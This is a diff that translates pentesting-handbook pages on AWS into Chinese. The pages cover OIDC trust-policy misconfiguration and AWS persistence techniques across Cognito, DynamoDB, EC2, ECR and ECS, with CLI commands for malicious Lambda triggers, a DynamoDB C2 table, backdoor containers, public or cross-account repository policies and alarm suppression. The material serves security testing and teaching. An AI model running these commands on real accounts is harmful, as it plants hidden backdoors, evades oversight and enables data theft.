+为了通过 SAML 配置 **身份联邦**,您只需提供一个 **名称** 和包含所有 SAML 配置的 **元数据 XML**(**端点**,**带有公钥的证书**)
-## OIDC - Github Actions Abuse
+## OIDC - Github Actions 滥用
-In order to add a github action as Identity provider:
-
-1. For _Provider type_, select **OpenID Connect**.
-2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
-3. Click on _Get thumbprint_ to get the thumbprint of the provider
-4. For _Audience_, enter `sts.amazonaws.com`
-5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
- - ```json
- {
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
- },
- "Action": "sts:AssumeRoleWithWebIdentity",
- "Condition": {
- "StringEquals": {
- "token.actions.githubusercontent.com:sub": [
- "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
- "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
- ],
- "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
- }
- }
- }
- ]
- }
- ```
-6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
-7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
-8. Finally use a github action to configure the AWS creds to be used by the workflow:
+为了将 github action 添加为身份提供者:
+1. 对于 _提供者类型_,选择 **OpenID Connect**。
+2. 对于 _提供者 URL_,输入 `https://token.actions.githubusercontent.com`
+3. 点击 _获取指纹_ 以获取提供者的指纹
+4. 对于 _受众_,输入 `sts.amazonaws.com`
+5. 创建一个具有 github action 所需的 **权限** 和信任提供者的 **信任策略** 的 **新角色**,例如:
+- ```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:sub": [
+"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
+"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
+],
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
+}
+```
+6. 请注意在前面的策略中,只有来自 **组织** 的 **存储库** 的一个 **分支** 被授权具有特定的 **触发器**。
+7. github action 将能够 **冒充** 的 **角色** 的 **ARN** 将是 github action 需要知道的“秘密”,因此 **将其存储** 在 **环境** 中的 **秘密** 内。
+8. 最后,使用 github action 配置工作流将使用的 AWS 凭据:
```yaml
name: "test AWS Access"
# The workflow should only trigger on pull requests to the main branch
on:
- pull_request:
- branches:
- - main
+pull_request:
+branches:
+- main
# Required to get the ID Token that will be used for OIDC
permissions:
- id-token: write
- contents: read # needed for private repos to checkout
+id-token: write
+contents: read # needed for private repos to checkout
jobs:
- aws:
- runs-on: ubuntu-latest
- steps:
- - name: Checkout
- uses: actions/checkout@v3
+aws:
+runs-on: ubuntu-latest
+steps:
+- name: Checkout
+uses: actions/checkout@v3
- - name: Configure AWS Credentials
- uses: aws-actions/configure-aws-credentials@v1
- with:
- aws-region: eu-west-1
- role-to-assume:${{ secrets.READ_ROLE }}
- role-session-name: OIDCSession
+- name: Configure AWS Credentials
+uses: aws-actions/configure-aws-credentials@v1
+with:
+aws-region: eu-west-1
+role-to-assume:${{ secrets.READ_ROLE }}
+role-session-name: OIDCSession
- - run: aws sts get-caller-identity
- shell: bash
+- run: aws sts get-caller-identity
+shell: bash
```
-
-## OIDC - EKS Abuse
-
+## OIDC - EKS 滥用
```bash
# Crate an EKS cluster (~10min)
eksctl create cluster --name demo --fargate
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate
# Create an Identity Provider for an EKS cluster
eksctl utils associate-iam-oidc-provider --cluster Testing --approve
```
-
-It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
-
+可以通过将集群的 **OIDC URL** 设置为 **新的 Open ID 身份提供者** 在 **EKS** 集群中生成 **OIDC 提供者**。这是一个常见的默认策略:
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
- },
- "Action": "sts:AssumeRoleWithWebIdentity",
- "Condition": {
- "StringEquals": {
- "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
- }
- }
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
+}
+}
+}
+]
}
```
+该策略正确地指示**只有**具有**id** `20C159CDF6F2349B68846BEC03BE031B`的**EKS集群**可以承担该角色。然而,它并没有指明哪个服务账户可以承担它,这意味着**任何具有Web身份令牌的服务账户**都将**能够承担**该角色。
-This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
-
-In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
-
+为了指定**哪个服务账户应该能够承担该角色,**需要指定一个**条件**,其中**指定服务账户名称**,例如:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
-
## References
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
index 28868b9f1..cde637d91 100644
--- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -2,20 +2,16 @@
{{#include ../../banners/hacktricks-training.md}}
-These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
+这些是您在每个要审计的 AWS 账户上需要的权限,以便能够运行所有提议的 AWS 审计工具:
-- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
-- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- - **access-analyzer:List\***
- - **access-analyzer:Get\***
- - **iam:CreateServiceLinkedRole**
- - **access-analyzer:CreateAnalyzer**
- - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
- - **access-analyzer:DeleteAnalyzer**
- - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
+- 默认策略 **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
+- 要运行 [aws_iam_review](https://github.com/carlospolop/aws_iam_review),您还需要以下权限:
+- **access-analyzer:List\***
+- **access-analyzer:Get\***
+- **iam:CreateServiceLinkedRole**
+- **access-analyzer:CreateAnalyzer**
+- 如果客户为您生成分析器,则可选,但通常直接请求此权限更容易)
+- **access-analyzer:DeleteAnalyzer**
+- 如果客户为您删除分析器,则可选,但通常直接请求此权限更容易)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
index f3b45c4d3..151e88fb6 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,6 +1 @@
-# AWS - Persistence
-
-
-
-
-
+# AWS - 持久性
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
index 6d2b0ec35..93f423119 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -4,7 +4,7 @@
## API Gateway
-For more information go to:
+有关更多信息,请访问:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
@@ -12,25 +12,21 @@ For more information go to:
### Resource Policy
-Modify the resource policy of the API gateway(s) to grant yourself access to them
+修改 API 网关的资源策略以授予自己访问权限
### Modify Lambda Authorizers
-Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
-Or just remove the use of the authorizer.
+修改 lambda 授权者的代码以授予自己对所有端点的访问权限。\
+或者只需删除授权者的使用。
### IAM Permissions
-If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
-Or just remove the use of the authorizer.
+如果资源使用 IAM 授权者,您可以通过修改 IAM 权限来授予自己访问权限。\
+或者只需删除授权者的使用。
### API Keys
-If API keys are used, you could leak them to maintain persistence or even create new ones.\
-Or just remove the use of API keys.
+如果使用了 API 密钥,您可以泄露它们以保持持久性,甚至创建新的密钥。\
+或者只需删除 API 密钥的使用。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
index e2e037e53..f6fc5df40 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -4,24 +4,24 @@
## Cognito
-For more information, access:
+有关更多信息,请访问:
{{#ref}}
../aws-services/aws-cognito-enum/
{{#endref}}
-### User persistence
+### 用户持久性
-Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
+Cognito 是一个允许为未认证和已认证用户分配角色并控制用户目录的服务。可以更改几种不同的配置以保持某种持久性,例如:
-- **Adding a User Pool** controlled by the user to an Identity Pool
-- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- - Or to an **authenticated Identity Pool** if the attacker can login
- - Or **improve the permissions** of the given roles
-- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
-- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
+- **将用户池**添加到由用户控制的身份池
+- 为**未认证身份池**提供**IAM角色并允许基本身份验证流程**
+- 或者为**已认证身份池**提供角色,如果攻击者可以登录
+- 或者**提高给定角色的权限**
+- **通过受控属性的用户或新用户在**用户池中**创建、验证和权限提升**
+- **允许外部身份提供者**在用户池或身份池中登录
-Check how to do these actions in
+查看如何执行这些操作
{{#ref}}
../aws-privilege-escalation/aws-cognito-privesc.md
@@ -29,18 +29,12 @@ Check how to do these actions in
### `cognito-idp:SetRiskConfiguration`
-An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
-
+具有此权限的攻击者可以修改风险配置,以便能够作为 Cognito 用户登录**而不会触发警报**。[**查看 cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html)以查看所有选项:
```bash
aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
-
-By default this is disabled:
+默认情况下,这是禁用的:
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
index 75a824e73..15d7ea70c 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -1,67 +1,59 @@
-# AWS - DynamoDB Persistence
+# AWS - DynamoDB 持久性
{{#include ../../../banners/hacktricks-training.md}}
### DynamoDB
-For more information access:
+有关更多信息,请访问:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
{{#endref}}
-### DynamoDB Triggers with Lambda Backdoor
-
-Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
+### 使用 Lambda 后门的 DynamoDB 触发器
+通过使用 DynamoDB 触发器,攻击者可以通过将恶意 Lambda 函数与表关联来创建一个 **隐蔽的后门**。当添加、修改或删除项目时,可以触发 Lambda 函数,从而允许攻击者在 AWS 账户内执行任意代码。
```bash
# Create a malicious Lambda function
aws lambda create-function \
- --function-name MaliciousFunction \
- --runtime nodejs14.x \
- --role \
- --handler index.handler \
- --zip-file fileb://malicious_function.zip \
- --region
+--function-name MaliciousFunction \
+--runtime nodejs14.x \
+--role \
+--handler index.handler \
+--zip-file fileb://malicious_function.zip \
+--region
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
- --table-name TargetTable \
- --region
+--table-name TargetTable \
+--region
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
- --function-name MaliciousFunction \
- --event-source \
- --region
+--function-name MaliciousFunction \
+--event-source \
+--region
```
+为了保持持久性,攻击者可以在DynamoDB表中创建或修改项目,这将触发恶意的Lambda函数。这允许攻击者在AWS账户内执行代码,而无需直接与Lambda函数交互。
-To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
-
-### DynamoDB as a C2 Channel
-
-An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
+### DynamoDB作为C2通道
+攻击者可以通过创建包含命令的项目并使用被攻陷的实例或Lambda函数来获取和执行这些命令,从而将DynamoDB表用作**命令和控制(C2)通道**。
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
- --table-name C2Table \
- --attribute-definitions AttributeName=CommandId,AttributeType=S \
- --key-schema AttributeName=CommandId,KeyType=HASH \
- --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
- --region
+--table-name C2Table \
+--attribute-definitions AttributeName=CommandId,AttributeType=S \
+--key-schema AttributeName=CommandId,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--region
# Insert a command into the table
aws dynamodb put-item \
- --table-name C2Table \
- --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
- --region
+--table-name C2Table \
+--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
+--region
```
-
-The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
+被攻陷的实例或 Lambda 函数可以定期检查 C2 表以获取新命令,执行它们,并可选择将结果报告回表中。这使攻击者能够保持对被攻陷资源的持久性和控制。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
index b52ac9e85..4e8eaf642 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -1,58 +1,54 @@
-# AWS - EC2 Persistence
+# AWS - EC2 持久性
{{#include ../../../banners/hacktricks-training.md}}
## EC2
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
-### Security Group Connection Tracking Persistence
+### 安全组连接跟踪持久性
-If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
+如果防御者发现**EC2 实例被攻陷**,他可能会尝试**隔离**该机器的**网络**。他可以通过显式的**拒绝 NACL**(但 NACL 会影响整个子网)或**更改安全组**来不允许**任何类型的入站或出站**流量。
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
+如果攻击者从该机器获得了**反向 shell**,即使安全组被修改为不允许入站或出站流量,**连接也不会被终止,因为** [**安全组连接跟踪**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**。**
-### EC2 Lifecycle Manager
+### EC2 生命周期管理器
-This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
-An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
+该服务允许**调度**创建**AMI 和快照**,甚至**与其他账户共享**。\
+攻击者可以配置**每周生成所有镜像或所有卷的 AMI 或快照**并**与他的账户共享**。
-### Scheduled Instances
+### 定时实例
-It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
+可以调度实例每天、每周甚至每月运行。攻击者可以运行一台具有高权限或有趣访问权限的机器。
-### Spot Fleet Request
+### Spot Fleet 请求
-Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
+Spot 实例比常规实例**便宜**。攻击者可以发起一个**为期 5 年的小型 Spot Fleet 请求**(例如),并**自动分配 IP**,以及一个**用户数据**,在**Spot 实例启动时**发送给攻击者**IP 地址**和**高权限 IAM 角色**。
-### Backdoor Instances
+### 后门实例
-An attacker could get access to the instances and backdoor them:
+攻击者可以访问实例并对其进行后门处理:
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
-- Backdooring the **User Data**
+- 例如使用传统的**rootkit**
+- 添加一个新的**公共 SSH 密钥**(查看 [EC2 权限提升选项](../aws-privilege-escalation/aws-ec2-privesc.md))
+- 对**用户数据**进行后门处理
-### **Backdoor Launch Configuration**
+### **后门启动配置**
-- Backdoor the used AMI
-- Backdoor the User Data
-- Backdoor the Key Pair
+- 对使用的 AMI 进行后门处理
+- 对用户数据进行后门处理
+- 对密钥对进行后门处理
### VPN
-Create a VPN so the attacker will be able to connect directly through i to the VPC.
+创建一个 VPN,以便攻击者能够直接通过它连接到 VPC。
-### VPC Peering
+### VPC 对等连接
-Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
+在受害者 VPC 和攻击者 VPC 之间创建对等连接,以便他能够访问受害者 VPC。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 07928fbd4..95a579b72 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -4,98 +4,88 @@
## ECR
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
-### Hidden Docker Image with Malicious Code
+### 带有恶意代码的隐藏Docker镜像
-An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
+攻击者可以**将包含恶意代码的Docker镜像**上传到ECR存储库,并利用它在目标AWS账户中保持持久性。然后,攻击者可以以隐蔽的方式将恶意镜像部署到账户内的各种服务,例如Amazon ECS或EKS。
-### Repository Policy
-
-Add a policy to a single repository granting yourself (or everybody) access to a repository:
+### 存储库策略
+向单个存储库添加策略,授予您自己(或所有人)对存储库的访问权限:
```bash
aws ecr set-repository-policy \
- --repository-name cluster-autoscaler \
- --policy-text file:///tmp/my-policy.json
+--repository-name cluster-autoscaler \
+--policy-text file:///tmp/my-policy.json
# With a .json such as
{
- "Version" : "2008-10-17",
- "Statement" : [
- {
- "Sid" : "allow public pull",
- "Effect" : "Allow",
- "Principal" : "*",
- "Action" : [
- "ecr:BatchCheckLayerAvailability",
- "ecr:BatchGetImage",
- "ecr:GetDownloadUrlForLayer"
- ]
- }
- ]
+"Version" : "2008-10-17",
+"Statement" : [
+{
+"Sid" : "allow public pull",
+"Effect" : "Allow",
+"Principal" : "*",
+"Action" : [
+"ecr:BatchCheckLayerAvailability",
+"ecr:BatchGetImage",
+"ecr:GetDownloadUrlForLayer"
+]
+}
+]
}
```
-
> [!WARNING]
-> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository.
+> 请注意,ECR要求用户通过IAM策略具有**权限**,以便在**认证**到注册表并从任何Amazon ECR存储库推送或拉取任何镜像之前,可以调用**`ecr:GetAuthorizationToken`** API。
-### Registry Policy & Cross-account Replication
+### 注册表策略与跨账户复制
-It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry.
+可以通过配置跨账户复制自动复制外部账户中的注册表,在那里您需要**指明外部账户**,您希望复制注册表。
-First, you need to give the external account access over the registry with a **registry policy** like:
-
+首先,您需要通过**注册表策略**授予外部账户对注册表的访问权限,例如:
```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
# With a .json like:
{
- "Sid": "asdasd",
- "Effect": "Allow",
- "Principal": {
- "AWS": "arn:aws:iam::947247140022:root"
- },
- "Action": [
- "ecr:CreateRepository",
- "ecr:ReplicateImage"
- ],
- "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
+"Sid": "asdasd",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::947247140022:root"
+},
+"Action": [
+"ecr:CreateRepository",
+"ecr:ReplicateImage"
+],
+"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}
```
-
-Then apply the replication config:
-
+然后应用复制配置:
```bash
aws ecr put-replication-configuration \
- --replication-configuration file://replication-settings.json \
- --region us-west-2
+--replication-configuration file://replication-settings.json \
+--region us-west-2
# Having the .json a content such as:
{
- "rules": [{
- "destinations": [{
- "region": "destination_region",
- "registryId": "destination_accountId"
- }],
- "repositoryFilters": [{
- "filter": "repository_prefix_name",
- "filterType": "PREFIX_MATCH"
- }]
- }]
+"rules": [{
+"destinations": [{
+"region": "destination_region",
+"registryId": "destination_accountId"
+}],
+"repositoryFilters": [{
+"filter": "repository_prefix_name",
+"filterType": "PREFIX_MATCH"
+}]
+}]
}
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
index 988626c8f..ab788d522 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md
@@ -1,32 +1,31 @@
-# AWS - ECS Persistence
+# AWS - ECS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## ECS
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-ecs-enum.md
{{#endref}}
-### Hidden Periodic ECS Task
+### 隐藏的周期性 ECS 任务
> [!NOTE]
-> TODO: Test
-
-An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account.
+> TODO: 测试
+攻击者可以使用 Amazon EventBridge 创建一个隐藏的周期性 ECS 任务,以**定期调度恶意任务的执行**。该任务可以进行侦察、外泄数据或在 AWS 账户中维持持久性。
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
- {
- "name": "malicious-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
]'
# Create an Amazon EventBridge rule to trigger the task periodically
@@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate
# Add a target to the rule to run the malicious ECS task
aws events put-targets --rule "malicious-ecs-task-rule" --targets '[
- {
- "Id": "malicious-ecs-task-target",
- "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
- "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
- "EcsParameters": {
- "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
- "TaskCount": 1
- }
- }
+{
+"Id": "malicious-ecs-task-target",
+"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster",
+"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role",
+"EcsParameters": {
+"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task",
+"TaskCount": 1
+}
+}
]'
```
-
-### Backdoor Container in Existing ECS Task Definition
+### 在现有 ECS 任务定义中添加后门容器
> [!NOTE]
-> TODO: Test
-
-An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities.
+> TODO: 测试
+攻击者可以在现有的 ECS 任务定义中添加一个 **隐蔽的后门容器**,该容器与合法容器并行运行。后门容器可用于持久性和执行恶意活动。
```bash
# Update the existing task definition to include the backdoor container
aws ecs register-task-definition --family "existing-task" --container-definitions '[
- {
- "name": "legitimate-container",
- "image": "legitimate-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- },
- {
- "name": "backdoor-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": false
- }
+{
+"name": "legitimate-container",
+"image": "legitimate-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+},
+{
+"name": "backdoor-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": false
+}
]'
```
-
### Undocumented ECS Service
> [!NOTE]
> TODO: Test
-An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service.
-
+攻击者可以创建一个**未记录的ECS服务**,该服务运行恶意任务。通过将所需的任务数量设置为最小并禁用日志记录,管理员更难注意到该恶意服务。
```bash
# Create a malicious task definition
aws ecs register-task-definition --family "malicious-task" --container-definitions '[
- {
- "name": "malicious-container",
- "image": "malicious-image:latest",
- "memory": 256,
- "cpu": 10,
- "essential": true
- }
+{
+"name": "malicious-container",
+"image": "malicious-image:latest",
+"memory": 256,
+"cpu": 10,
+"essential": true
+}
]'
# Create an undocumented ECS service with the malicious task definition
aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
index bdb282d41..4270bb779 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
@@ -1,25 +1,21 @@
-# AWS - EFS Persistence
+# AWS - EFS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## EFS
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-efs-enum.md
{{#endref}}
-### Modify Resource Policy / Security Groups
+### 修改资源策略 / 安全组
-Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
+通过修改 **资源策略和/或安全组**,您可以尝试将您的访问持久化到文件系统中。
-### Create Access Point
+### 创建访问点
-You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
+您可以 **创建一个访问点**(具有对 `/` 的根访问权限),该访问点可以从您已实施 **其他持久性** 的服务访问,以保持对文件系统的特权访问。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
index c55e0e2ba..ac6bc142e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -4,31 +4,30 @@
## Elastic Beanstalk
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-elastic-beanstalk-enum.md
{{#endref}}
-### Persistence in Instance
+### 实例中的持久性
-In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
